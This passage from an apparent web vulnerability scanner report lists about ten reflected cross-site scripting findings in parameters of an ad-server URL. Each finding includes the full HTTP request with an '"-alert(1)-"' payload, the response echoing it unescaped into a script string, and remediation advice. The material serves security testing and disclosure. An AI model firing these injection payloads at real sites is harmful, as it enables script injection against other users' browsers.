User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:12:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=9600a"-alert(1)-"d571cc2dd60&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa");
var fsc
...[SNIP]...

1.5. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [cpnmodule parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fc0c"-alert(1)-"c3d973c4897 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=8fc0c"-alert(1)-"c3d973c4897&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:12:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
5%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=8fc0c"-alert(1)-"c3d973c4897&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa");

...[SNIP]...

1.6. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [e parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload efeff"-alert(1)-"757feda799a was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3efeff"-alert(1)-"757feda799a&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6914

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
38009996/38027753/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3efeff"-alert(1)-"757feda799a&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://
...[SNIP]...

1.7. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [epartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e9c4"-alert(1)-"0b886bae39e was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=2e9c4"-alert(1)-"0b886bae39e&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:19 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=2e9c4"-alert(1)-"0b886bae39e&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na
...[SNIP]...

1.8. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [event parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84813"-alert(1)-"890b6b1225 was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=84813"-alert(1)-"890b6b1225 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6897
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 22 Nov 2010 00:13:43 GMT
Expires: Mon, 22 Nov 2010 00:13:43 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=84813"-alert(1)-"890b6b1225http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg =
...[SNIP]...

1.9. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [h parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 766b0"-alert(1)-"ab23b56765f was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn766b0"-alert(1)-"ab23b56765f&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:05:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
/3a5a/17/181/%2a/z%3B231241976%3B1-0%3B0%3B55844876%3B4307-300/250%3B38009999/38027756/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn766b0"-alert(1)-"ab23b56765f&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.
...[SNIP]...

1.10. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f565a"-alert(1)-"9d4fb7009e3 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_USf565a"-alert(1)-"9d4fb7009e3&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:06:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
/k%3B231241976%3B2-0%3B0%3B55844876%3B4307-300/250%3B38010001/38027758/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_USf565a"-alert(1)-"9d4fb7009e3&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI
...[SNIP]...

1.11. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [nd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b891f"-alert(1)-"1810bff2486 was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080b891f"-alert(1)-"1810bff2486&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:08:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
%3B55844876%3B4307-300/250%3B38010001/38027758/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080b891f"-alert(1)-"1810bff2486&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11
...[SNIP]...

1.12. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [o parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ccc4"-alert(1)-"9b23ea1ba4b was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a8ccc4"-alert(1)-"9b23ea1ba4b&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:04:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
%3Dv8/3a5a/17/181/%2a/z%3B231241976%3B1-0%3B0%3B55844876%3B4307-300/250%3B38009999/38027756/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a8ccc4"-alert(1)-"9b23ea1ba4b&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121
...[SNIP]...

1.13. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [oepartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fad38"-alert(1)-"c08febe9059 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=fad38"-alert(1)-"c08febe9059&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=fad38"-alert(1)-"c08febe9059&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_sourc
...[SNIP]...

1.14. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [orh parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8bca5"-alert(1)-"629032b61be was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com8bca5"-alert(1)-"629032b61be&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6914

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
